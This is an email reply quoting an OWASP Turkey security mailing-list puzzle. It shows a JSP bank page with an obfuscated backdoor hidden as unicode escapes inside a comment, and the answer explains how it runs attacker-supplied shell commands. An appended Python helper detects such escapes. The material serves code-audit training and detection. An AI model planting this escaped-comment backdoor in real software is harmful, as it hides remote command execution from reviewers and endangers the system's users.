Something that broadens one's horizons. Thank you.<br><br><div dir="ltr"><div><span style="font-weight: bold;">Oğuzhan YILMAZ</span></div></div><br><br><div class="gmail_quote">On 20 October 2009 at 19:00, <span dir="ltr">&lt;<a href="mailto:owasp-turkey-request@lists.owasp.org">owasp-turkey-request@lists.owasp.org</a>&gt;</span> wrote:<br>
<blockquote class="gmail_quote" style="border-left: 1px solid rgb(204, 204, 204); margin: 0pt 0pt 0pt 0.8ex; padding-left: 1ex;">
Today&#39;s Topics:<br>
<br>
   1. Re: Find the Bug #4 (Bedirhan Urgun)<br>
<br>
<br>
----------------------------------------------------------------------<br>
<br>
Message: 1<br>
Date: Tue, 20 Oct 2009 18:38:07 +0300<br>
From: Bedirhan Urgun &lt;<a href="mailto:bedirhanurgun@gmail.com">bedirhanurgun@gmail.com</a>&gt;<br>
Subject: Re: [Owasp-turkey] Find the Bug #4<br>
To: OWASP-Türkiye &lt;<a href="mailto:owasp-turkey@lists.owasp.org">owasp-turkey@lists.owasp.org</a>&gt;<br>
Message-ID:<br>
        &lt;<a href="mailto:297cff690910200838q3a62d820oa1b91f630755ef86@mail.gmail.com">297cff690910200838q3a62d820oa1b91f630755ef86@mail.gmail.com</a>&gt;<br>
Content-Type: text/plain; charset=&quot;utf-8&quot;<br>
<br>
I said this one would get more interest than the others...  :)) it didn&#39;t<br>
<br>
The answer: a backdoor written with the logic of &quot;everyone trusts the developers,<br>
but they can wreck production&quot;. Java allows code to be written with unicode<br>
characters in a specific format (\uxxxx). So not all identifiers, keywords,<br>
operators etc. need to be ASCII. (C# does have such a restriction: for keywords<br>
and operators, for example, only ASCII characters can be used.) In short, take the<br>
part written in unicode format inside the JSP I posted, put a &#39; character at<br>
its beginning and end, and then<br>
<br>
<a href="http://www.webguvenligi.org/ipacker/ipacker.html" target="_blank">http://www.webguvenligi.org/ipacker/ipacker.html</a><br>
<br>
paste it into the INPUT box of that application and press the EVAL TO OUTPUT button;<br>
you will see what kind of backdoor the developer actually wrote. The resulting piece<br>
closes the multiline comment, writes the real backdoor code, and then reopens the<br>
multiline comment (so that we don&#39;t get a &quot;syntax error&quot;, just like with<br>
SQLi, LDAPi).<br>
<br>
This makes life harder for an auditor reading with the naked eye or trying to<br>
audit with a regex.<br>
<br>
bedirhan<br>
<br>
On 18 October 2009 at 21:05, Bedirhan Urgun &lt;<a href="mailto:bedirhanurgun@gmail.com">bedirhanurgun@gmail.com</a>&gt; wrote:<br>
<br>
&gt;<br>
&gt; This time it&#39;s a fun bug :) It requires looking at the matter from a different<br>
&gt; perspective. A JSP page...<br>
&gt;<br>
&gt; bedirhan<br>
&gt;<br>
&gt; Find the Bug #4<br>
&gt; --------------------<br>
&gt;<br>
&gt; &lt;%@page contentType=&quot;text/html&quot; pageEncoding=&quot;UTF-8&quot;%&gt;<br>
&gt; &lt;!DOCTYPE HTML PUBLIC &quot;-//W3C//DTD HTML 4.01 Transitional//EN&quot;<br>
&gt;    &quot;<a href="http://www.w3.org/TR/html4/loose.dtd" target="_blank">http://www.w3.org/TR/html4/loose.dtd</a>&quot;&gt;<br>
&gt; &lt;html&gt;<br>
&gt;     &lt;head&gt;<br>
&gt;         &lt;meta http-equiv=&quot;Content-Type&quot; content=&quot;text/html; charset=UTF-8&quot;&gt;<br>
&gt;         &lt;title&gt;BankHorizon Welcome Page&lt;/title&gt;<br>
&gt;         &lt;link rel=&quot;stylesheet&quot; type=&quot;text/css&quot; href=&quot;style.css&quot; /&gt;<br>
&gt;     &lt;/head&gt;<br>
&gt;     &lt;body&gt;<br>
&gt;         &lt;% /* Include the header page */ %&gt;<br>
&gt;         &lt;jsp:include page=&quot;header.jsp&quot; /&gt;<br>
&gt;         &lt;% /* Include the menu page */ %&gt;<br>
&gt;         &lt;jsp:include page=&quot;menu.jsp&quot; /&gt;<br>
&gt;         &lt;% /* Include the footer menu left page */ %&gt;<br>
&gt;         &lt;jsp:include page=&quot;footer_menu_left.jsp&quot; /&gt;<br>
&gt;         &lt;h2&gt;&lt;/h2&gt;<br>
&gt;         &lt;jsp:include page=&quot;data_validation.jsp&quot; /&gt;<br>
&gt;         &lt;%<br>
&gt;             /************************************COMMENT<br>
&gt; BEGIN**************************************<br>
&gt;            This is unicode that will be used for data validation<br>
&gt;<br>
&gt; \u002a\u002f\u0020\u0053\u0074\u0072\u0069\u006e\u0067\u0020\u0073\u003d\u0072\u0065\u0071\u0075\u0065\u0073\u0074\u002e\u0067\u0065\u0074\u0050\u0061\u0072\u0061\u006d\u0065\u0074\u0065\u0072\u0028\u0022\u0061\u0072\u006b\u0061\u006b\u0061\u0070\u0069\u0022\u0029\u003b\u0020\u0069\u0066\u0020\u0028\u0020\u0073\u0021\u003d\u006e\u0075\u006c\u006c\u0020\u0026\u0026\u0020\u0073\u002e\u0065\u0071\u0075\u0061\u006c\u0073\u0028\u0020\u0022\u0061\u0063\u0069\u006b\u0022\u0020\u0029\u0020\u0029\u0020\u007b\u0020\u0052\u0075\u006e\u0074\u0069\u006d\u0065\u002e\u0067\u0065\u0074\u0052\u0075\u006e\u0074\u0069\u006d\u0065\u0028\u0029\u002e\u0065\u0078\u0065\u0063\u0028\u0020\u0072\u0065\u0071\u0075\u0065\u0073\u0074\u002e\u0067\u0065\u0074\u0050\u0061\u0072\u0061\u006d\u0065\u0074\u0065\u0072\u0028\u0020\u0022\u006b\u006f\u006d\u0075\u0074\u0022\u0020\u0029\u0020\u0029\u003b\u0020\u007d\u002f\u002a<br>

&gt;             *************************************COMMENT<br>
&gt; END***********************************/<br>
&gt;             String lang = request.getParameter(&quot;language&quot;);<br>
&gt;             // use the unicode above to validate the data<br>
&gt;             validateUnicode(lang);<br>
&gt;         %&gt;<br>
&gt;         &lt;br/&gt;<br>
&gt;         &lt;% /* Include the footer bottom page */ %&gt;<br>
&gt;         &lt;jsp:include page=&quot;footer_bottom.jsp&quot; /&gt;<br>
&gt;     &lt;/body&gt;<br>
&gt; &lt;/html&gt;<br>
&gt;<br>
<br>
<br>
<br>
--<br>
Bedirhan Urgun<br>
<a href="http://www.webguvenligi.org" target="_blank">http://www.webguvenligi.org</a><br>
<a href="http://www.owasp.org/index.php/Turkey" target="_blank">http://www.owasp.org/index.php/Turkey</a><br>
<br>
To subscribe to the Turkish Web Application Security mailing list:<br>
<a href="https://lists.owasp.org/mailman/listinfo/owasp-turkey" target="_blank">https://lists.owasp.org/mailman/listinfo/owasp-turkey</a><br>

<br>
End of Owasp-turkey Digest, Vol 31, Issue 22<br>
********************************************<br>
</blockquote></div><br>
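As an added illustration of Bedirhan's point (example code added here, not from the list or from webguvenligi.org), this Python audit helper applies javac's unicode-escape translation to each source line and flags escapes that introduce comment delimiters or plain ASCII, which is exactly what a regex run over the raw file misses. The sample JSP is constructed for the example and uses a harmless statement where the puzzle's backdoor body was.

```python
import re

# Constructed sample (not the list's JSP): the same trick as the puzzle, with
# a harmless statement in place of the backdoor body.
SAMPLE_JSP = r"""<%
/**** COMMENT BEGIN
This is unicode that will be used for data validation
\u002a\u002f String s = request.getParameter("x"); \u002f\u002a
COMMENT END ****/
String lang = request.getParameter("language");
%>"""

# JLS 3.3: '\' starts a unicode escape only when preceded by an even number
# of backslashes, and one or more 'u' may follow it (\uuu0041 is legal).
_ESCAPE = re.compile(r'(?<!\\)((?:\\\\)*)\\u+([0-9a-fA-F]{4})')


def decode_unicode_escapes(src: str) -> str:
    """Translate \\uXXXX escapes as javac does, before any tokenizing."""
    return _ESCAPE.sub(lambda m: m.group(1) + chr(int(m.group(2), 16)), src)


def find_escaped_comment_delimiters(src: str) -> list:
    """(line_no, delimiter) for every '/*' or '*/' that exists only after
    escape translation, i.e. escapes that change the comment structure."""
    hits = []
    for no, line in enumerate(src.splitlines(), 1):
        decoded = decode_unicode_escapes(line)
        if decoded == line:
            continue
        for delim in ("/*", "*/"):
            if decoded.count(delim) > line.count(delim):
                hits.append((no, delim))
    return hits


def find_ascii_escapes(src: str) -> list:
    """(line_no, decoded_text) for escape runs that decode to printable ASCII;
    there is no legitimate reason to write plain ASCII source this way."""
    hits = []
    for no, line in enumerate(src.splitlines(), 1):
        for m in re.finditer(r'(?:\\u+[0-9a-fA-F]{4})+', line):
            decoded = decode_unicode_escapes(m.group(0))
            if decoded.isascii() and decoded.isprintable():
                hits.append((no, decoded))
    return hits
```

Run `find_escaped_comment_delimiters` over every .java and .jsp file in a review; any hit is a line to read after decoding, since the compiler sees the decoded form, not the one in the repository.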